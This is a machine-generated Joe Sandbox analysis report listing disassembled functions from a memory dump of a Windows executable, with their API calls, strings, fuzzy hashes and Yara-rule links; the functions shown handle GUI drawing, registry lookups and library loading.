Instruction Fuzzy Hash: 34318634644604AFD711EB65C889F9E7BE0EF09308F558076B9049B3A2D778AE40CB99

Function 004780A8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00477FD0: GetWindowThreadProcessId.USER32(00000000), ref: 00477FD8
Part of subcall function 00477FD0: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,004780CF,0049D0A8,00000000), ref: 00477FEB
Part of subcall function 00477FD0: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477FF1

SendMessageA.USER32(00000000,0000004A,00000000,00478462), ref: 004780DD
GetTickCount.KERNEL32 ref: 00478122
GetTickCount.KERNEL32 ref: 0047812C
MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00478181

Strings

CallSpawnServer: Unexpected status: %d, xrefs: 0047816A
CallSpawnServer: Unexpected response: $%x, xrefs: 00478112

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
API String ID: 613034392-3771334282
Opcode ID: c7480ea5248a76885aa581e3ee921a1a12fc6fcdeb10822e96bf497bbef75b79
Instruction ID: 23b6b6b43e2695b35219bdfabe49a415745965cef25793df2ffc6287c46841aa
Opcode Fuzzy Hash: c7480ea5248a76885aa581e3ee921a1a12fc6fcdeb10822e96bf497bbef75b79
Instruction Fuzzy Hash: 5F319334F402159ADB10EBB9898A7EEB6A4DF45314F50C03EB548EB382DA7C8D4587AD

Function 0045982C Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 86libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 004598E7

Strings

Fusion.dll, xrefs: 00459887
Failed to load .NET Framework DLL "%s", xrefs: 004598CC
.NET Framework CreateAssemblyCache function failed, xrefs: 0045990A
Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 004598F2
CreateAssemblyCache, xrefs: 004598DE

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc
String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
API String ID: 190572456-3990135632
Opcode ID: b3dedf4d09771b8e3211b538b580fafb75041ab66ed76c1853c4b6e39797986c
Instruction ID: f91bc12d19f1fe408be280579c06801c7313a3191b14845461a6c76c6493a406
Opcode Fuzzy Hash: b3dedf4d09771b8e3211b538b580fafb75041ab66ed76c1853c4b6e39797986c
Instruction Fuzzy Hash: B1318470E04659ABCB01EFA5C88169EB7A8AF44315F50857EE814A7382DB389E08C799

Function 0041C158 Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065

GetFocus.USER32 ref: 0041C178
GetDC.USER32(?), ref: 0041C184
SelectPalette.GDI32(?,?,00000000), ref: 0041C1A5
RealizePalette.GDI32(?), ref: 0041C1B1
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1F0
ReleaseDC.USER32(?,?), ref: 0041C1FD

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Palette$Select$BitsFocusObjectRealizeRelease
String ID:
API String ID: 3303097818-0
Opcode ID: 7919d48a5b742b990554a8e16781250233d38a1b512c062c402771df9818cd79
Instruction ID: 8ccc34f866771a30a1661531480aea9d283d3c3e19187e20a9e7c35f18d949ed
Opcode Fuzzy Hash: 7919d48a5b742b990554a8e16781250233d38a1b512c062c402771df9818cd79
Instruction Fuzzy Hash: 45112C71A40609BBDB10DBE9DC85FAFB7FCEB48700F54446AB514E7281D67899408B68

Function 00418C64 Relevance: 10.6, APIs: 7, Instructions: 67COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000E), ref: 00418C80
GetSystemMetrics.USER32(0000000D), ref: 00418C88
6F9A2980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E

Part of subcall function 00410808: 6F99C400.COMCTL32(0049C628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 0041080C

6FA0CB00.COMCTL32(0049C628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
6FA0C740.COMCTL32(00000000,?,0049C628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
6FA0CB00.COMCTL32(0049C628,00000001,?,?,00000000,?,0049C628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
6F9A0860.COMCTL32(0049C628,00418D1F,?,00000000,?,0049C628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: MetricsSystem$A0860A2980C400C740
String ID:
API String ID: 1086221473-0
Opcode ID: ea814aff01982a735542cfcaa5f2d759ebf4f13d0bc11ea9e85cdf93c4d7c833
Instruction ID: 86feed5bc36cb920ea04fcbc52f338b48e1a9a04039637533027038eb31c68aa
Opcode Fuzzy Hash: ea814aff01982a735542cfcaa5f2d759ebf4f13d0bc11ea9e85cdf93c4d7c833
Instruction Fuzzy Hash: 43114975B44304BBEB10FBA5DC83F9D73B9DB48704F6040A6B604EB2D1DAB99D808758

Function 00484150 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48

RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00484208), ref: 004841ED

Strings

ProductType, xrefs: 0048418C
WinNT, xrefs: 0048419D
LanmanNT, xrefs: 004841B7
System\CurrentControlSet\Control\ProductOptions, xrefs: 00484174
ServerNT, xrefs: 004841D1

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseOpen
String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
API String ID: 47109696-2530820420
Opcode ID: 9e77c2a8355bf950addc698619abebac90bd80bfa9f43d4adbdb48c9eae7aef1
Instruction ID: c07cac4acaa77b59f2fcd2c5e8c20c92fe22663a7df472bca0d1e55dfbcce728
Opcode Fuzzy Hash: 9e77c2a8355bf950addc698619abebac90bd80bfa9f43d4adbdb48c9eae7aef1
Instruction Fuzzy Hash: 81119334B082059AD700F7A69C0AB5E7BE8DBA5348F6148B7B800E7281E778AE41C71C

Function 0041B472 Relevance: 10.6, APIs: 7, Instructions: 57windowCOMMON

Download Yara Rule

APIs

SelectObject.GDI32(00000000,?), ref: 0041B480
SelectObject.GDI32(?,00000000), ref: 0041B48F
StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
SelectObject.GDI32(?,00000000), ref: 0041B4D7
DeleteDC.GDI32(00000000), ref: 0041B4E0
DeleteDC.GDI32(?), ref: 0041B4E9

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ObjectSelect$Delete$Stretch
String ID:
API String ID: 1458357782-0
Opcode ID: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
Instruction ID: ae96c6176d6eb3f3494de580be991e563f9897aa79c0ee3e7df45ff247fef712
Opcode Fuzzy Hash: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
Instruction Fuzzy Hash: 89115C72F44619ABDB10DADDD886FEFB7BCEB08704F044455B614F7282C678AD418BA8

Function 00495BE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00495BF1

Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7

SelectObject.GDI32(00000000,00000000), ref: 00495C13
GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00496191), ref: 00495C27
GetTextMetricsA.GDI32(00000000,?), ref: 00495C49
ReleaseDC.USER32(00000000,00000000), ref: 00495C66

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00495C1E

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
API String ID: 2948443157-222967699
Opcode ID: 691ce413467488e034de834b989fc2e025067cd5002ece6e443aa881a737f8dc
Instruction ID: 6d86e16e7996164c3d99a70d64bcdfbf35cb9465fd6ee9b2fa75eb6a08a4ab21
Opcode Fuzzy Hash: 691ce413467488e034de834b989fc2e025067cd5002ece6e443aa881a737f8dc
Instruction Fuzzy Hash: 05016176A04709ABDB05DBA98C41E5FB7ECDB49704F21047ABA00E7691D678AE008B28

Function 004233A4 Relevance: 10.6, APIs: 7, Instructions: 56threadwindowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 004233BF
WindowFromPoint.USER32(?,?), ref: 004233CC
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
GetCurrentThreadId.KERNEL32 ref: 004233E1
SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
SetCursor.USER32(00000000), ref: 00423423

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
String ID:
API String ID: 1770779139-0
Opcode ID: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
Instruction ID: 0489214c39e5746bc568676ade8a3ee1219ea943f6d585d977b545401c7ee2ca
Opcode Fuzzy Hash: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
Instruction Fuzzy Hash: 2001D42230562036D6217B795C86E2F22A8CB85B65F50447FB645BB283D93D8C00537D

Function 00495A04 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll), ref: 00495A14
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495A21
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00495A2E

Strings

user32.dll, xrefs: 00495A0F
MonitorFromRect, xrefs: 00495A1B
GetMonitorInfoA, xrefs: 00495A28

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
API String ID: 667068680-2254406584
Opcode ID: 3c8b88976e6e67713f1e6fb0365be4ac33276af7b519073db6005e1fda00490b
Instruction ID: 6bb6bd91ed17cc43c826bdde37d3733eb090f1301ce7563d8f1f25412fa62683
Opcode Fuzzy Hash: 3c8b88976e6e67713f1e6fb0365be4ac33276af7b519073db6005e1fda00490b
Instruction Fuzzy Hash: 0AF0F6A2B42F1526DA1161760CC1B7F698CCF81760F680237BD45A7382E96C8D0543AD

Function 0045D730 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D739
GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D749
GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D759

Strings

BZ2_bzDecompressEnd, xrefs: 0045D753
BZ2_bzDecompressInit, xrefs: 0045D733
BZ2_bzDecompress, xrefs: 0045D743

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc
String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
API String ID: 190572456-212574377
Opcode ID: 575c4cb06a2452c1401fa841c1313ffc0221effe76d11e7dd1aabe4620aafca8
Instruction ID: 6c96be05a1394ea18707f7eb6152f5503904c11dec58d168239e3d414ffdbae6
Opcode Fuzzy Hash: 575c4cb06a2452c1401fa841c1313ffc0221effe76d11e7dd1aabe4620aafca8
Instruction Fuzzy Hash: 6FF0D0B0D00600DFE724EF369C8672736D5ABA871EF54943BA9499526AD778084ECE1C

Function 0042EA2C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30libraryloaderwindowCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,0049A934,00457299,0045763C,004571F0,00000000,00000B06,00000000,00000000,00000000,00000002,00000000,004817AB), ref: 0042EA45
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA4B
InterlockedExchange.KERNEL32(0049C668,00000001), ref: 0042EA5C

Part of subcall function 0042E9BC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA80,00000004,0049A934,00457299,0045763C,004571F0,00000000,00000B06,00000000,00000000,00000000,00000002,00000000), ref: 0042E9D2
Part of subcall function 0042E9BC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9D8
Part of subcall function 0042E9BC: InterlockedExchange.KERNEL32(0049C660,00000001), ref: 0042E9E9

ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,0049A934,00457299,0045763C,004571F0,00000000,00000B06,00000000,00000000,00000000,00000002,00000000), ref: 0042EA70

Strings

user32.dll, xrefs: 0042EA40
ChangeWindowMessageFilterEx, xrefs: 0042EA3B

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
String ID: ChangeWindowMessageFilterEx$user32.dll
API String ID: 142928637-2676053874
Opcode ID: 1a4120a275a7a58fb50942f7be9802eb4510f593f9b94c8c2bcf046027c2ff71
Instruction ID: ee3a30ffd41cbbfe6d6edcae89b7e54a60ed140ac131bcc27b6a733ad903a47d
Opcode Fuzzy Hash: 1a4120a275a7a58fb50942f7be9802eb4510f593f9b94c8c2bcf046027c2ff71
Instruction Fuzzy Hash: 7FE06DA1741620BAEA10B7B66CC6FAA2668AB18B19F50103BF100A51D1C2BD0C80CA5D

Function 0044C850 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleacc.dll,?,0044F0FD), ref: 0044C85F
GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C870
GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C880

Strings

oleacc.dll, xrefs: 0044C85A
CreateStdAccessibleObject, xrefs: 0044C87A
LresultFromObject, xrefs: 0044C86A

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
API String ID: 2238633743-1050967733
Opcode ID: 09135f5945541ae78a6af7b678b7c17e974eae42bf5bb0e3fde62042262af164
Instruction ID: 3dac3c94951c3f326fc139052019a1d9618f5d358237ac6f028f958aa2bdce3c
Opcode Fuzzy Hash: 09135f5945541ae78a6af7b678b7c17e974eae42bf5bb0e3fde62042262af164
Instruction Fuzzy Hash: E6F01CB02823068BF750BBB1ECC5B263294E76570AF18117BA001A62E2D7BD4888CF1C

Function 0047905C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,004992FC), ref: 00479062
GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 0047906F
GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 0047907F

Strings

VerifyVersionInfoW, xrefs: 00479079
kernel32.dll, xrefs: 0047905D
VerSetConditionMask, xrefs: 00479069

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
API String ID: 667068680-222143506
Opcode ID: f2527f3e8acae3901293ffe8f3822438352d858e28b091300cd7299335f6a370
Instruction ID: fd16aae75e34d792cc346ba171bb4a4eccdb771972da16ee3cf818c899e4fb82
Opcode Fuzzy Hash: f2527f3e8acae3901293ffe8f3822438352d858e28b091300cd7299335f6a370
Instruction Fuzzy Hash: F3C012F0A50740E9DA00B7B11CC3E7B256CD540B28720803B748D75183D57C0C044F3C

Function 0041B67C Relevance: 9.1, APIs: 6, Instructions: 144windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0041B755
GetDC.USER32(?), ref: 0041B761
SelectPalette.GDI32(00000000,?,00000000), ref: 0041B796
RealizePalette.GDI32(00000000), ref: 0041B7A2
CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7D0
SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B804

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Palette$Select$BitmapCreateFocusRealize
String ID:
API String ID: 3275473261-0
Opcode ID: c0b27d3b7a66d9be5bed6a7f47b95188f2d45c1e9081e04c5e1905c96dbfd583
Instruction ID: a2c5ddb66569cb6b77bb8b351ce757b8a6afb07cbb9f01b77a2eee85226ebd67
Opcode Fuzzy Hash: c0b27d3b7a66d9be5bed6a7f47b95188f2d45c1e9081e04c5e1905c96dbfd583
Instruction Fuzzy Hash: BB512F74A00208DFCB11DFA9C855AEEBBB9FF49704F104066F504A7390D7789981CBA9

Function 0041B94C Relevance: 9.1, APIs: 6, Instructions: 142windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0041BA27
GetDC.USER32(?), ref: 0041BA33
SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA6D
RealizePalette.GDI32(00000000), ref: 0041BA79
CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA9D
SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAD1

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Palette$Select$BitmapCreateFocusRealize
String ID:
API String ID: 3275473261-0
Opcode ID: 2ce40bb40bbcf4fda08707fe581e59aceef162c3ea3b02671fd4d2ee797de512
Instruction ID: 9811d2e4aff7790a224b19fb8c07a8c8a8d7caa6f03daf8ca787c0bc2bb5238d
Opcode Fuzzy Hash: 2ce40bb40bbcf4fda08707fe581e59aceef162c3ea3b02671fd4d2ee797de512
Instruction Fuzzy Hash: 48512974A002189FCB11DFA9C891AAEBBF9FF48700F15806AF504EB751D7789D40CBA4

Function 0041B518 Relevance: 9.1, APIs: 6, Instructions: 113windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0041B58E
GetDC.USER32(?), ref: 0041B59A
GetDeviceCaps.GDI32(?,00000068), ref: 0041B5B6
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5D3
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5EA
ReleaseDC.USER32(?,?), ref: 0041B636

Memory Dump Source

